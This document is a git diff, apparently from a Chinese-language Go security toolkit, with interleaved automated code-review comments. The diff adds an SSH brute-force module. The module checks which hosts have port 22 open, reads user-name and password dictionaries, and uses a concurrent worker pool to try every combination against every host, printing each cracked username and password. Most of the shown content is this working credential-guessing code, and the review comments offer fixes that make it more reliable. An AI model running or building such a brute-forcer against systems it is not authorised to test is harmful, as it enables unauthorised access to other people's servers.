diff --git a/src/genmai/ArgParser/ParameterParser.go b/src/genmai/ArgParser/ParameterParser.go index 9623b3c..3bf31f5 100755 --- a/src/genmai/ArgParser/ParameterParser.go +++ b/src/genmai/ArgParser/ParameterParser.go @@ -9,6 +9,7 @@ import( "strconv" "log" "main/genmai" + "main/tools/SSHExplosion" ) var Num int @@ -184,4 +185,25 @@ func WKPWD(WKPWD string ,PWDList []string){ fmt.Println("弱密码已生成") } return +} +//SSH爆破 +func SSHBurst (SSHBurst string,SSHBurstList []string){ + if SSHBurst =="true"{ + SSHHostCheck,list:=IPCheck(SSHBurstList[0]) + if SSHHostCheck!="true"{ + fmt.Println("host格式报错",list) + log.Println("host格式报错") + }else{ + poolNums,err:= strconv.Atoi(SSHBurstList[1]) + if err!=nil{ + fmt.Println(err) + log.Println(err) + }else{ + + SSHExplosion.SshExp(list[:],poolNums) + + } + } + } + return } \ No newline at end of file diff --git a/src/main b/src/main index a486748..bab1d54 100755 Binary files a/src/main and b/src/main differ diff --git a/src/main.go b/src/main.go index 3a6fa08..8184a94 100755 --- a/src/main.go +++ b/src/main.go @@ -26,6 +26,7 @@ type Vul struct{ MD string //生成MD文件 RemoteAssessment string //远程检测,所需参数在RAVUL中 WKPWD string //弱口令生成,所需参数在WKPWDVUL结构体中 + SSHBurst string //SSH爆破 } type RAVUL struct{ @@ -71,7 +72,7 @@ func main(){ //远程模块参数 RA := flag.Bool("RA", false, "使用远程检测,只能单独使用模块") - flag.StringVar(&RAV.SSHHost, "H", "false", "远程检测指定host") + flag.StringVar(&RAV.SSHHost, "host", "false", "远程检测指定host") flag.StringVar(&RAV.SSHUser, "user", "false", "远程检测指定用户") flag.StringVar(&RAV.SSHPassword, "passwd", "false", "远程登录密码") @@ -81,7 +82,12 @@ func main(){ flag.StringVar(&WKV.CompanyName, "CPN", "0", "设置特定公司名") flag.StringVar(&WKV.Name, "Name", "0", "设置姓名") flag.StringVar(&WKV.Nums, "Nums", "0", "设置特殊数字(如年份)") - // return + + // SSH爆破模块 + SSHB:= flag.Bool("SSHBurst", false, "使用SSH爆破") + + + // All := flag.Bool("all", false, "只扫描system,kernel的所有poc以及检测baselin模块,不可联合其他参数使用") 
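Review bot: `SSHBurst` indexes `SSHBurstList[0]` and `SSHBurstList[1]` without checking the slice length and passes `poolNums` on with no lower bound. A guard such as `if len(SSHBurstList) < 2 { return }` at the top and `if poolNums < 1 { return }` after `strconv.Atoi` would stop a short list from panicking, and would stop a zero `ParserNum` from reaching `runTask`, which would then start no workers and block on its first `taskCh <- task`. The parameter is also named `SSHBurst`, shadowing the function, and carries a boolean as the string `"true"`; a `bool` named `enabled` would read more clearly. Because this is the entry point that starts password guessing against every address `IPCheck` returns, logging the resolved target list and worker count before `SSHExplosion.SshExp` would leave an audit record of what a run touched.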
@@ -92,6 +98,8 @@ func main(){ //将插件模块的值存放到数组中 PWDList :=[...]string{WKV.CompanyName,WKV.Name,WKV.Nums} + poolNums:=strconv.Itoa(vul.ParserNum) + SSHBurstList :=[...]string{RAV.SSHHost,poolNums} //初始化bool值 sAll :=strconv.FormatBool(*All) @@ -99,6 +107,7 @@ func main(){ vul.RemoteAssessment=strconv.FormatBool(*RA) vul.WKPWD=strconv.FormatBool(*WK) help:=strconv.FormatBool(*Help) + vul.SSHBurst =strconv.FormatBool(*SSHB) //是否开启远程检测 if vul.RemoteAssessment=="true"{ @@ -113,6 +122,8 @@ func main(){ }else{ ArgParser.WKPWD(vul.WKPWD,PWDList[:]) + ArgParser.SSHBurst(vul.SSHBurst,SSHBurstList[:]) + return ArgParser.ParameterParser(vul.System,vul.Kernel,vul.Web,vul.BaseLine,sAll,vul.PoolStatNum,vul.ParserNum,vul.Update,vul.IP,help) } return diff --git a/src/tools/SSHExplosion/CheckAlive.go b/src/tools/SSHExplosion/CheckAlive.go new file mode 100644 index 0000000..ef4ba1e --- /dev/null +++ b/src/tools/SSHExplosion/CheckAlive.go @@ -0,0 +1,16 @@ +package SSHExplosion + +import( + "net" + "fmt" + "time" +) + +func checkAlive(ip string) bool { + alive := false + _, err := net.DialTimeout("tcp", fmt.Sprintf("%v:%v", ip, "22"), time.Second*5) + if err == nil { + alive = true + } + return alive + } \ No newline at end of file diff --git a/src/tools/SSHExplosion/ReadFile.go b/src/tools/SSHExplosion/ReadFile.go index 62d2e76..fda21ca 100644 --- a/src/tools/SSHExplosion/ReadFile.go +++ b/src/tools/SSHExplosion/ReadFile.go 
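Review bot: The `return` added directly after `ArgParser.SSHBurst(vul.SSHBurst,SSHBurstList[:])` makes the following `ArgParser.ParameterParser(...)` call unreachable, so the normal scan path in this branch no longer runs whether or not `-SSHBurst` was given. If the intent is to stop only after an SSH run, make it conditional: `if vul.SSHBurst == "true" { return }`. `go vet` reports the unreachable call. The body of `main` extends beyond this hunk.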
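Review bot: `checkAlive` discards the `net.Conn` returned by `net.DialTimeout`, so every reachable host leaves a socket open until garbage collection or process exit, and a large target list can exhaust file descriptors. Keep the connection and close it: `conn, err := net.DialTimeout("tcp", net.JoinHostPort(ip, "22"), 5*time.Second)`, then `if err != nil { return false }` and `conn.Close()`. `net.JoinHostPort` also brackets IPv6 literals, which the `%v:%v` format does not, and the `fmt` import is then no longer needed in this file.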
@@ -1,33 +1,26 @@ package SSHExplosion import( - "log" - "io" + // "log" + // "io" "os" "bufio" + "strings" ) -//用户名 -func readName(path string)(listName []string){ - //打开文件 - file, err := os.Open(path) //只是用来读的时候,用os.Open。相对路径,针对于同目录下。 - if err != nil{ - log.Printf("打开文件失败,err:%v\n",err) - return - } - defer file.Close() //关闭文件,为了避免文件泄露和忘记写关闭文件 - //使用buffio读取文件内容 - reader := bufio.NewReader(file) //创建新的读的对象 - for { - line , err := reader.ReadString('\n') //注意是字符,换行符。 - if err == io.EOF{ - log.Println("文件读完了") - break - } - if err != nil{ //错误处理 - log.Printf("读取文件失败,错误为:%v",err) - return - } - listName =append(listName,line) - } - return listName -} +func readFile(filename string) ([]string, error) { + file, err := os.Open(filename) + if err != nil { + return nil, err + } + defer file.Close() + scanner := bufio.NewScanner(file) + scanner.Split(bufio.ScanLines) + var result []string + for scanner.Scan() { + passwd := strings.TrimSpace(scanner.Text()) + if passwd != "" { + result = append(result, passwd) + } + } + return result, err +} \ No newline at end of file diff --git a/src/tools/SSHExplosion/SSHConnect.go b/src/tools/SSHExplosion/SSHConnect.go index ee151b9..f5c222f 100755 --- a/src/tools/SSHExplosion/SSHConnect.go +++ b/src/tools/SSHExplosion/SSHConnect.go 
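Review bot: `readFile` ends with `return result, err`, where `err` is the `os.Open` result and is always nil at that point, and it never consults `scanner.Err()`. A read failure or a line longer than the scanner's buffer therefore ends the loop silently, and the caller gets a truncated list with a nil error; return `result, scanner.Err()` instead. `scanner.Split(bufio.ScanLines)` is the default and can go, as can the commented-out `log` and `io` imports. The loop variable `passwd` also holds user names when `SshExp` reads `name.txt`, so `line` would be more accurate.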
@@ -25,84 +25,11 @@ func SshConnect(ip, username, password string) (bool, error) { if err == nil { defer client.Close() session, err := client.NewSession() - errRet := session.Run("echo 飞雪无情") + errRet := session.Run(" ") if err == nil && errRet == nil { defer session.Close() success = true } } return success, err -} -// func SshConnect(SSHHost string,SSHUser string, SSHPassword string)(result string){ - -// sshHost := SSHHost - -// sshUser := SSHUser - -// sshPassword := SSHPassword - -// sshType := "password" - -// sshPort := 22 - - -// //创建sshp登陆配置 - -// config := &ssh.ClientConfig{ - -// Timeout: 5*time.Second,//ssh 连接time out 时间一秒钟, 如果ssh验证错误 会在一秒内返回 - -// User: sshUser, - -// HostKeyCallback: ssh.InsecureIgnoreHostKey(), - -// //HostKeyCallback: hostKeyCallBackFunc(h.Host), - -// } - -// if sshType == "password" { - -// config.Auth = []ssh.AuthMethod{ssh.Password(sshPassword)} - -// } - -// //dial 获取ssh client - -// addr := fmt.Sprintf("%s:%d", sshHost, sshPort) - -// sshClient, err := ssh.Dial("tcp", addr, config) - -// if err != nil { - -// log.Fatal("创建ssh client 失败",err) -// } - -// defer sshClient.Close() - -// //创建ssh-session - -// session, err := sshClient.NewSession() - -// if err != nil { - -// log.Fatal("创建ssh session 失败",err) - - -// } - -// defer session.Close() -// command :="whoami" -// //执行远程命令 -// combo,err := session.CombinedOutput(command) - -// if err != nil { - -// log.Fatal("远程执行cmd 失败",err,command) - - -// } -// log.Println("ssh connect succ") -// defer session.Close() -// result=string(combo) -// return result -// } \ No newline at end of file +} \ No newline at end of file diff --git a/src/tools/SSHExplosion/SSHCoprogram.go b/src/tools/SSHExplosion/SSHCoprogram.go index 9974a0e..dca9d9d 100644 --- a/src/tools/SSHExplosion/SSHCoprogram.go +++ b/src/tools/SSHExplosion/SSHCoprogram.go @@ -2,8 +2,7 @@ package SSHExplosion import ( "fmt" "sync" - // "time" - "strings" + "log" ) // Pool goroutine Pool 
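Review bot: `session.Run(" ")` is called before the `err` from `client.NewSession()` is checked, so when session creation fails `session` is nil and the call panics; since `runTask` calls `SshConnect` from worker goroutines, that panic ends the whole process. Check first with `if err != nil { return false, err }`, then `defer session.Close()` and run the command; as written the session is only closed on the success path. The start of `SshConnect` (client configuration and dial) is outside the hunk, so the host-key handling cannot be reviewed from here.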
@@ -46,31 +45,72 @@ func (p *Pool) Wait() { p.wg.Wait() } -func SSHCoprogram(vul map[string]interface{}) { +type Task struct { + ip string + user string + password string + } + +func SSHCoprogram(vul map[string]interface{}){ readNameFile:=vul["readNameFile"].([]string) readPWDFile:=vul["readPWDFile"].([]string) - host:=vul["ip"].(string) + host:=vul["ip"].([]string) nums:=vul["nums"].(int) - fmt.Println(len(readNameFile),len(readPWDFile)) - // 这里限制100个并发 - pool := New(nums) // sync.WaitGroup{} - //假设需要发送1000万个http请求,然后我并发100个协程取完成这件事 - for j := 0; j < len(readNameFile); j++{ - for i := 0; i < len(readPWDFile); i++ { - pool.Add(1) //发现已存在100个人正在发了,那么就会卡住,直到有人完成了宣布自己退出协程了 - go func(i int) { - // fmt.Println(j,i,readPWDFile[i],host) - username := readNameFile[j] - username = strings.Replace(username,"\n","",-1) - passwd := readPWDFile[i] - passwd = strings.Replace(passwd,"\n","",-1) - result, _:=SshConnect(host,username,passwd) - if result { - fmt.Println("suc : ",host,username,passwd) - } - pool.Done() - }(i) - } - pool.Wait() + + + var tasks []Task + for _, user := range readNameFile { + for _, password := range readPWDFile { + for _, ip := range host { + tasks = append(tasks, Task{ip, user, password}) + } + } } + + runTask(tasks,nums) + +} + + +func runTask(tasks []Task, threads int) { + var wg sync.WaitGroup + taskCh := make(chan Task, threads*2) + for i := 0; i < threads; i++ { + go func() { + for task := range taskCh { + success, _ := SshConnect(task.ip, task.user, task.password) + if success { + fmt.Printf("破解%v成功,用户名是%v,密码是%v\n", task.ip, task.user, task.password) + }else{ + log.Printf("破解%v失败,用户名是%v,密码是%v\n",task.ip, task.user, task.password) + } + wg.Done() + } + }() + } + for _, task := range tasks { + wg.Add(1) + taskCh <- task + } + wg.Wait() + close(taskCh) + } + + + +//检测开启ssh的IP +func checkAlivePool(ipList []string,nums int)(aliveIP []string){ + pool := New(nums) + for _,ip:=range ipList{ + pool.Add(1) + go func(ip string) { + v:=checkAlive(ip) + if v{ 
+ aliveIP=append(aliveIP,ip) + } + pool.Done() + }(ip) + } + pool.Wait() + return aliveIP } \ No newline at end of file diff --git a/src/tools/SSHExplosion/SshExplosion.go b/src/tools/SSHExplosion/SshExplosion.go index b4be3c7..18e2fa8 100644 --- a/src/tools/SSHExplosion/SshExplosion.go +++ b/src/tools/SSHExplosion/SshExplosion.go @@ -1,19 +1,19 @@ package SSHExplosion import( - // "fmt" + "fmt" ) -func SshExp(){ - var readNameFile []string - var readPWDFile []string - - readNameFile=readName("../data/dic/name.txt") - readPWDFile=readName("../data/dic/dic.txt") +func SshExp(ipList []string ,nums int){ + readNameFile,err:=readFile("../data/dic/name.txt") + readPWDFile,err1:=readFile("../data/dic/dic.txt") + fmt.Println(readNameFile,err,err1) vul:=make(map[string]interface{}) + aliveIP:=checkAlivePool(ipList[:],nums) + vul["readNameFile"]=readNameFile vul["readPWDFile"]=readPWDFile - vul["ip"]="127.0.0.1" - vul["nums"]=500 + vul["ip"]=aliveIP + vul["nums"]=nums SSHCoprogram(vul) } \ No newline at end of file
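Review bot: `checkAlivePool` appends to the shared `aliveIP` slice from every goroutine without synchronisation, a data race that can drop hosts or corrupt the slice. Guard it with a `var mu sync.Mutex` declared beside `pool`, then `mu.Lock(); aliveIP = append(aliveIP, ip); mu.Unlock()`. In `runTask`, every failed attempt goes to the log and every hit to stdout with the password in clear text; keep the password out of the failure line and treat the success output as sensitive, for example a results file with restricted permissions rather than console scrollback. `runTask` also drops the error from `SshConnect`, so an unreachable host is logged the same way as a rejected login. `SSHCoprogram` uses unchecked type assertions on `vul[...]`, which panic on a missing or mistyped key; plain typed parameters would remove that.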
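Review bot: `SshExp` prints `err` and `err1` from `readFile` together with the whole user-name list and then carries on, so a missing `../data/dic/name.txt` or `../data/dic/dic.txt` produces a run over an empty list with no clear failure. Check each error and stop, e.g. `if err != nil { fmt.Println(err); return }`, and drop the debug `fmt.Println(readNameFile,err,err1)`. The dictionary paths are relative to the working directory rather than to the binary, which is worth stating in a doc comment on `SshExp`.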